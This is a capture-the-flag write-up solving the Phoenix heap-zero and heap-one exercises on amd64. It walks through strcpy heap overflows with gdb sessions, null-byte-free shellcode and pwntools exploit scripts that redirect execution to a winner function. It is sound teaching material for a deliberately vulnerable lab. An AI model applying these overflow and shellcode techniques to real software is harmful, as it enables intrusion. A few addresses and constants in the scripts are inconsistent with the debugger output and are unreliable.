I want to provide some writeups for the excellent Phoenix challenges. There are plenty of writeups for these exercises, but you don’t know if you truly understood something until you try to explain it to someone else, so here I am trying to do just that.
Introduction
I am fairly comfortable with Stack and Format string exploitation, so at the moment I will focus my attention to the part where I am most lacking: heap exploitation.
I will also attempt the challenges for amd64
as this architecture presents few additional challenges that I see many people bypassed in writeups going for the 32-bit versions (mostly, lots of null-bytes in addresses).
Heap-zero
The first challenge is very straightforward:
We have two functions declared, nowinner
and winner
. The first is called, and we need to call the second. The program uses two structures, one consisting of a 64bytes array and the second of a function pointer plus some padding.
In the main function the following happens:
- Two structures (one of each type) are declared
- A malloc call is used to initialize the data structure
- A malloc call is used to initialize the second structure
- The function pointer of the second structure is set to the
nowinner
function strcpy
is used, without boundary check, to copy the command line argument into the first structure- The function pointer of the second structure is used to invoke the function
Exploit Strategy
The exploit idea is simple: we need to overwrite the data of the second structure, so that the function pointer rather than being the address of nowinner
will be the address of winner
.
To do that, we can leverage the strcpy
call, as we control the command line argument.
First, let’s observe the memory layout:
b *0x0000000000400b4e
We set a breakpoint just before the strcpy
, then we run the program with just a few “A”s.
strcpy@plt (
$rdi = 0x00007ffff7ef6010 → 0x0000000000000000,
$rsi = 0x00007fffffffe7a9 → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
$rdx = 0x00007fffffffe7a9 → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
$rcx = 0x00007ffff7da5e14 → <mmap64+133> cmp rax, 0xffffffffffffffff
)
We see that the arguments seem to be more or less what we expected. The first argument (rdi
) is the destination where the string is going to be copied, while the second argument (rsi
) is the source string that will be copied.
If we now jump to the next line of code (with u
) we reach just after strcpy
returned.
At the target memory we have what we expected:
gef➤ x /40dwx 0x7ffff7ef6010
0x7ffff7ef6010: 0x41414141 0x41414141 0x41414141 0x41414141
0x7ffff7ef6020: 0x41414141 0x41414141 0x41414141 0x00414141
0x7ffff7ef6030: 0x00000000 0x00000000 0x00000000 0x00000000
0x7ffff7ef6040: 0x00000000 0x00000000 0x00000000 0x00000000
0x7ffff7ef6050: 0x00000000 0x00000000 0x00000051 0x00000000
0x7ffff7ef6060: 0x00400ace 0x00000000 0x00000000 0x00000000
0x7ffff7ef6070: 0x00000000 0x00000000 0x00000000 0x00000000
0x7ffff7ef6080: 0x00000000 0x00000000 0x00000000 0x00000000
0x7ffff7ef6090: 0x00000000 0x00000000 0x00000000 0x00000000
0x7ffff7ef60a0: 0x00000000 0x00000000 0x000fff61 0x00000000
We can see that our As are copied to the address that was in rdi
. The data structure was 64 bytes, and we can see that we filled approximately half the buffer. After 64 bytes we have 16 bytes of metadata, and then the next chunk (where the second structure is allocated) begins.
We can also see a value 0x00400ace
at byte 0x7ffff7ef6060
. This is the address of nowinner
:
gef➤ p nowinner
$2 = {<text variable, no debug info>} 0x400ace <nowinner>
We could just overflow the buffer with 64 + 16 bytes, reach the function pointer and overwrite it with our winner
function. Unfortunately, there is a problem in this case, and the problem is that our winner
function is at address:
gef➤ p winner
$3 = {<text variable, no debug info>} 0x400abd <winner>
This address contains not only a null byte (in reality 5 null bytes, but in this case as the memory is conveniently set to 0, it is not a problem), but also a byte 0x0a
. This will be replaced by strcpy
with a null byte, and will stop copying the string.
In fact, we can first attempt this trivial solution to verify that we can control rip
:
gef➤ run $(python -c 'print "A"*80 + "\xbd\x0a\x40"')
[...]
gef➤ x /40dwx 0x7ffff7ef6010
0x7ffff7ef6010: 0x41414141 0x41414141 0x41414141 0x41414141
0x7ffff7ef6020: 0x41414141 0x41414141 0x41414141 0x41414141
0x7ffff7ef6030: 0x41414141 0x41414141 0x41414141 0x41414141
0x7ffff7ef6040: 0x41414141 0x41414141 0x41414141 0x41414141
0x7ffff7ef6050: 0x41414141 0x41414141 0x41414141 0x41414141
0x7ffff7ef6060: 0x004000bd 0x00000000 0x00000000 0x00000000
After the strcpy
call, we can verify that the function pointer was correctly overwritten, but the value is 0x004000bd
. In fact, strcpy
stopped working after the 0a
, and the 40
byte is correct just because the nowinner
function also has value 40
in that position.
Continuing the execution crashes as expected with:
gef➤ c
Continuing.
data is at 0x7ffff7ef6010, fp is at 0x7ffff7ef6060, will be calling 0x4000bd
Program received signal SIGSEGV, Segmentation fault.
0x00000000004000bd in ?? ()
Redirecting Control
The good news from the previous attempt is that we control rip
, so we can redirect execution where we want. The binary has no protections whatsoever, so we have multiple choices.
The way I chose is to write a simple shellcode that will do the following:
- push the address of
winner
to stack - execute
ret
The ret
instruction will just take the top of the stack and put it in the rip
. Since we specifically pushed (i.e. placed on top of the stack) the address of winner
, this function will be executed.
However, this shellcode cannot have null (or 0a
) bytes either. To avoid null bytes I have the done the following:
[SECTION .text]
global _start
_start:
mov rax, 0xffffffffff511bce ; rax = 0x400abd + ffffffffff111111
sub rax, 0xffffffffff111111 ; rax = 0xffffffffff511bce - ffffffffff111111 = 0x400abd
push rax ; push rax to the stack
ret
Now all it’s left is to build the shellcode and extract the opcodes:
user@phoenix-amd64:~/heap-zero$ nasm shellcode.asm -f elf64
user@phoenix-amd64:~/heap-zero$ ld -o shellcode shellcode.o
user@phoenix-amd64:~/heap-zero$ echo "\"$(objdump -d shellcode | grep '[0-9a-f]:' | cut -d$'\t' -f2 | grep -v 'file' | tr -d " \n" | sed 's/../\\x&/g')\""
"\x48\xc7\xc0\xce\x1b\x51\xff\x48\x2d\x11\x11\x11\xff\x50\xc3
The final strategy will be the following:
- Place the shellcode in the first buffer
- Add padding until the function pointer to overwrite
- Overwrite the function pointer with the address of the buffer
We know that the first buffer is at 0x7ffff7ef6010
, and we know that to overwrite the function pointer we need 80 bytes, therefore the exploit will be the following:
from pwn import *
context.arch = 'amd64'
data = 0x7ffff7ef6010
shellcode = "\x48\xc7\xc0\xce\x1b\x51\xff\x48\x2d\x11\x11\x11\xff\x50\xc3"
buf = shellcode
buf += "A"*(80-len(buf))
buf += p64(data)
print buf
Running heap-zero
with the printed buffer result in the level to be completed.
./heap-zero $(python exploit.py)
-bash: warning: command substitution: ignored null byte in input
Welcome to phoenix/heap-zero, brought to you by https://exploit.education
data is at 0x7ffff7ef6010, fp is at 0x7ffff7ef6060, will be calling 0x7ffff7ef6010
Congratulations, you have passed this level
Heap-one
In the next challenge we are in a slightly more complex situation.
In the code we see that a structure is declared, having an int (priority) and a pointer to string (name) as fields. The winner
function is once again declared but not called anywhere.
The main function does the following:
- declare two instances of the structure
- use
malloc
to initialize the first structure - set priority to 1 (struct 1)
- use
malloc
to initialize the name of the first structure - use
malloc
to initialize the second structure - set priority to 2 (struct 2)
- use malloc to initialize the name of the second structure
- use
strcpy
(without boundary check) to copy the first command line argument intoname
of the first structure - use
strcpy
(without boundary check) to copy the second command line argument intoname
of the second structure - use
printf
Let’s first observe the data structures of the binary during a normal execution.
We place a breakpoint right before the puts
(printf in the code) call and then run the program.
gef➤ b *0x0000000000400ae7
Breakpoint 1 at 0x400ae7
gef➤ run AAAAAAAA BBBBBBBB
Starting program: /home/user/heap-one/heap-one AAAAAAAA BBBBBBBB
Observing the memory in the heap we see the following:
gef➤ search-pattern AAAA
[+] Searching 'AAAA' in memory
[+] In (0x7ffff7ef6000-0x7ffff7ff6000), permission=rwx
0x7ffff7ef6030 - 0x7ffff7ef6038 → "AAAAAAAA"
0x7ffff7ef6034 - 0x7ffff7ef6038 → "AAAA"
[+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rwx
0x7fffffffe7b9 - 0x7fffffffe7c1 → "AAAAAAAA"
0x7fffffffe7bd - 0x7fffffffe7c1 → "AAAA"
gef➤ x /40dwx 0x7ffff7ef6030-48
0x7ffff7ef6000: 0x00000000 0x00000000 0x00000021 0x00000000
0x7ffff7ef6010: 0x00000001 0x00000000 0xf7ef6030 0x00007fff
0x7ffff7ef6020: 0x00000000 0x00000000 0x00000021 0x00000000
0x7ffff7ef6030: 0x41414141 0x41414141 0x00000000 0x00000000
0x7ffff7ef6040: 0x00000000 0x00000000 0x00000021 0x00000000
0x7ffff7ef6050: 0x00000002 0x00000000 0xf7ef6070 0x00007fff
0x7ffff7ef6060: 0x00000000 0x00000000 0x00000021 0x00000000
0x7ffff7ef6070: 0x42424242 0x42424242 0x00000000 0x00000000
0x7ffff7ef6080: 0x00000000 0x00000000 0x000fff81 0x00000000
0x7ffff7ef6090: 0x00000000 0x00000000 0x00000000 0x00000000
We can clearly see that the name
of the two structures is filled with As and Bs, but we can also see the following heap structure:
8 bytes of 0s
--- First chunk ---
0x21 (size 32 for prev chunk) (8 bytes)
0x1 (priority of struct 1) (8 bytes)
0x7ffff7ef6030 (pointer to name of struct 1) (8 bytes)
8 bytes of 0s
--- Second chunk ---
0x21 (size 32 for prev chunk) (8 bytes)
name (struct 1) (8 bytes)
16 bytes of 0s
--- Third chunk ---
0x21 (size 32 for prev chunk) (8 bytes)
0x2 (priority of struct 2) (8 bytes)
0x7ffff7ef6070 (pointer to name of struct 2) (8 bytes)
8 bytes of 0s
--- Fourth chunk ---
0x21 (size 32 for prev chunk) (8 bytes)
name (struct 2) 8 bytes
In particular, it’s important to stress the behavior of strcpy
calls:
strcpy(i1->name, argv[1]);
strcpy(i2->name, argv[2]);
The first call will take the first command line argument and place it at the address pointed by name
. This address at this point is the return value from malloc
, we do not control it (0x7ffff7ef6030
). The second call will take the second command line argument and place it at the address pointed by name
(struct 2). We do not control this address either, but, we do have a strcpy operation without boundary checks that will write before this pointer.
Exploit Strategy
Building on what was discussed so far, the exploit strategy will be the following:
- Fill the struct 1
name
- Overflow the buffer until the
name
pointer for struct 2 is overwritten
This is essentially a write
primitive, as strcpy
will place for us what we put in the second command line argument, at the address pointed by the value we will overflow the pointer with.
The payload is roughly as follows:
JUNK + WRITE_ADDRESS + WRITE_CONTENT
With a write primitive, one reasonable strategy could be to overwrite a PLT entry (for example for puts
, as this function is called right after in the code) with the address of the winner
function. This strategy is what for example this writeup highlights, and it’s also the first thing that I thought. Unfortunately, I also faced the same challenge of the author of that writeup, namely that we have a lot of null bytes in the address we need to overwrite (puts
address).
=> 0x0000000000400ae7 <+170>: call 0x400840 <puts@plt>
gef➤ x /3i 0x400840
0x400840 <puts@plt>: jmp QWORD PTR [rip+0x20398a] # 0x6041d0 <puts@got.plt>
0x400846 <puts@plt+6>: push 0x5
0x40084b <puts@plt+11>: jmp 0x4007e0
The address of puts
in the GOT is at 0x6041d0
, but unfortunately, the data we are overwriting is initially:
0xf7ef6070 0x00007fff
If we just skip the null bytes at the beginning, we will obtain 0x7fff004007e0
, not 0x00000000004007e0
.
We can try this approach just to prove the correctness of our reasoning:
gef➤ run $(python -c 'print "A"*40+"\xe0\x07\x40"') BBBBBBB
Starting program: /home/user/heap-one/heap-one $(python -c 'print "A"*40+"\xe0\x07\x40"') BBBBBBB
Breakpoint 2, 0x0000000000400add in main ()
strcpy@plt (
$rdi = 0x00007fff004007e0,
$rsi = 0x00007fffffffe7c3 → 0x0042424242424242 ("BBBBBBB"?),
$rdx = 0x00007fffffffe7c3 → 0x0042424242424242 ("BBBBBBB"?)
)
Indeed we see that strcpy
will try to write at 0x00007fff004007e0
our “B”s.
In order to circumvent this issue, I decided to change approach and rather than overwriting a GOT entry, overwrite some value on the stack.
If we set a breakpoint on the ret
instruction of the main
function, we see that the stack has the following setup:
gef➤ run AAAAAAA BBBBBBB
Starting program: /home/user/heap-one/heap-one AAAAAAA BBBBBBB
and that's a wrap folks!
Breakpoint 3, 0x0000000000400af2 in main ()
0x00007fffffffe4e8│+0x0000: 0x00007ffff7d8fd62 → <__libc_start_main+54> mov edi, eax ← $rsp
0x00007fffffffe4f0│+0x0008: 0x0000000000000000
0x00007fffffffe4f8│+0x0010: 0x00007fffffffe530 → 0x0000000000000003
0x00007fffffffe500│+0x0018: 0x0000000000000000
0x00007fffffffe508│+0x0020: 0x00007ffff7ffdbc8 → 0x00007ffff7ffdbc8 → [loop detected]
0x00007fffffffe510│+0x0028: 0x0400000100003e00
0x00007fffffffe518│+0x0030: 0x0000000000400909 → nop DWORD PTR [rax+0x0]
0x00007fffffffe520│+0x0038: 0x0000000000000000
The top of the stack is at 0x00007fffffffe4e8
and it’s the value that will go in the rip
next:
stepi
[#0] 0x7ffff7d8fd62 → __libc_start_main()
Note that this value will change depending on the length of our command line arguments, as those values will determine the stack size as well. Therefore, in order to get the final value, we should run the program with arguments of the same length of our payload. For example, running with arguments A
and B
we get 0x00007fffffffe4f8
.
What we can do then is the following:
- Fill the buffer
- Overwrite the
name
pointer with the address of themain
return address - Write at that address one address that points to an area we control (for example, the
name
of the first structure)
Once main
will return, the value in the saved return address will be placed in rip
, and this will redirect control to our buffer.
The payload then will look roughly as follows:
SHELLCODE + PAD + SAVED_RETURN + ADDR_OF_SHELLCODE
Note that the address of winner
has once again a 0a
byte:
0x400af3
If that was not the case, we could try to overwrite the save return pointer with the address of winner
directly.
Final Exploit
At this point we have all the pieces for the exploit:
- The address for the buffer where we can place the shellcode is at
0x7fffffef6030
- The stack address we want to overwrite is
0x7fffffffe4c8
- as we can see with a 40/8 bytes command line arguments.
We are missing just the shellcode, which would be extremely similar to the one for heap-zero
:
[SECTION .text]
global _start
_start:
mov rax, 0xFFFFFFFFFF511C04 ; rax = 0x400af3 + 0xFFFFFFFFF111111
sub rax, 0xFFFFFFFFF111111 ; rax = 0xFFFFFFFFFF511C04 - 0xFFFFFFFFF111111 = 0x400af3
push rax ; push rax
ret
We build the shellcode and extract the opcodes:
"\x48\xc7\xc0\x04\x1c\x51\xff\x48\x2d\x11\x11\x11\xff\x50\xc3"
Finally, we can assemble the exploit:
# -*- coding: utf-8 -*-
# run $(python exploit.py) $(python -c 'print "\x30\x60\xef\xf7\xff\x7f\x00\x00"')
from pwn import *
context.arch = 'amd64'
data = 0x7fffffef6030
rbp = 0x7fffffffe4c8
shellcode = "\x48\xc7\xc0\x04\x1c\x51\xff\x48\x2d\x11\x11\x11\xff\x50\xc3"
buf = shellcode
buf += "A"*(40-len(buf))
buf += p64(rbp)
print buf
This script will print only the first argument, we need the second argument (the “what” to write, i.e. the address of the buffer - data
variable).
Analysis
In order to better understand why the exploit works, we can walk through the code.
We set three breakpoints:
gef➤ b *0x0000000000400ac4
Breakpoint 1 at 0x400ac4
gef➤ b *0x0000000000400add
Breakpoint 2 at 0x400add
gef➤ b *0x0000000000400af2
Breakpoint 3 at 0x400af2
Right after the first strcpy, right before the second strcpy, and right before the ret
of main
.
Then, we run the program:
gef➤ run $(python exploit.py) $(python -c 'print "\x30\x60\xef\xf7\xff\x7f\x00\x00"')
Starting program: /home/user/heap-one/heap-one $(python exploit.py) $(python -c 'print "\x30\x60\xef\xf7\xff\x7f\x00\x00"')
After the first strcpy
we can see that the overflow already happened, and the pointer to name
of struct 2 has been correctly overwritten:
gef➤ x /100dwx 0x7ffff7ef6030-48
0x7ffff7ef6000: 0x00000000 0x00000000 0x00000021 0x00000000
0x7ffff7ef6010: 0x00000001 0x00000000 0xf7ef6030 0x00007fff
0x7ffff7ef6020: 0x00000000 0x00000000 0x00000021 0x00000000
0x7ffff7ef6030: 0x04c0c748 0x48ff511c 0x1111112d 0x41c350ff
0x7ffff7ef6040: 0x41414141 0x41414141 0x41414141 0x41414141
0x7ffff7ef6050: 0x41414141 0x41414141 --> 0xffffe4c8 0x00007fff <---
0x7ffff7ef6060: 0x00000000 0x00000000 0x00000021 0x00000000
0x7ffff7ef6070: 0x00000000 0x00000000 0x00000000 0x00000000
0x7ffff7ef6080: 0x00000000 0x00000000 0x000fff81 0x00000000
That will be the where to write, and it’s the stack address that holds the saved return pointer for the main
function:
0x00007fffffffe4a0│+0x0000: 0x00007fffffffe518 → 0x00007fffffffe778 → "/home/user/heap-one/heap-one" ← $rsp
0x00007fffffffe4a8│+0x0008: 0x00000003ffffe538
0x00007fffffffe4b0│+0x0010: 0x00007ffff7ef6050 → 0x4141414141414141
0x00007fffffffe4b8│+0x0018: 0x00007ffff7ef6010 → 0x0000000000000001
0x00007fffffffe4c0│+0x0020: 0x0000000000000003 ← $rbp
0x00007fffffffe4c8│+0x0028: 0x00007ffff7d8fd62 → <__libc_start_main+54> mov edi, eax
0x00007fffffffe4d0│+0x0030: 0x0000000000000000
0x00007fffffffe4d8│+0x0038: 0x00007fffffffe510 → 0x0000000000000003
Right now it’s not the top of the stack, but we can see that it points somewhere in __libc_start_main
.
Continuing the execution, we reach breakpoint 2, right before the second strcpy
call, which right now is our write primitive.
strcpy@plt (
$rdi = 0x00007fffffffe4c8 → 0x00007ffff7d8fd62 → <__libc_start_main+54> mov edi, eax,
$rsi = 0x00007fffffffe7c4 → 0x4c007ffff7ef6030,
$rdx = 0x00007fffffffe7c4 → 0x4c007ffff7ef6030
)
We can see that it’s trying essentially to do
*0x00007fffffffe4c8 = 0x007ffff7ef6030
We do not need to worry about the first “dirty” 4c
byte, as strcpy
will stop copying at the first null byte.
If we check what we have at 0x007ffff7ef6030
, we can see our shellcode.
gef➤ x /5i 0x00007ffff7ef6030
0x7ffff7ef6030: mov rax,0xffffffffff511c04
0x7ffff7ef6037: sub rax,0xffffffffff111111
0x7ffff7ef603d: push rax
0x7ffff7ef603e: ret
0x7ffff7ef603f: rex.B
In reality this is just the beginning of name
for struct 1
0x7ffff7ef6030: 0x04c0c748 0x48ff511c 0x1111112d 0x41c350ff
0x7ffff7ef6040: 0x41414141 0x41414141 0x41414141 0x41414141
0x7ffff7ef6050: 0x41414141 0x41414141 0xffffe4c8 0x00007fff
0x7ffff7ef6060: 0x00000000 0x00000000 0x00000021 0x00000000
After the strcpy
call (jumping it with u
) we see that:
0x00007fffffffe4c8│+0x0028: 0x00007ffff7ef6030 → 0x48ff511c04c0c748 ← $rax, $rdi
The value is set correctly, so now we can once again continue and reach our third breakpoint.
Here we can see that the overwritten item is on top of the stack, and if we step one instruction:
stepi
$rip : 0x00007ffff7ef6030 → 0x48ff511c04c0c748
rip
now points at our shellcode, continuing the execution will trigger the winner
function.
gef➤ c
Continuing.
Congratulations, you've completed this level @ 1656192533 seconds past the Epoch
The program really crashes after, we could modify the shellcode to include a call to exit(0)
if we wanted to avoid the crash and be perfectionists.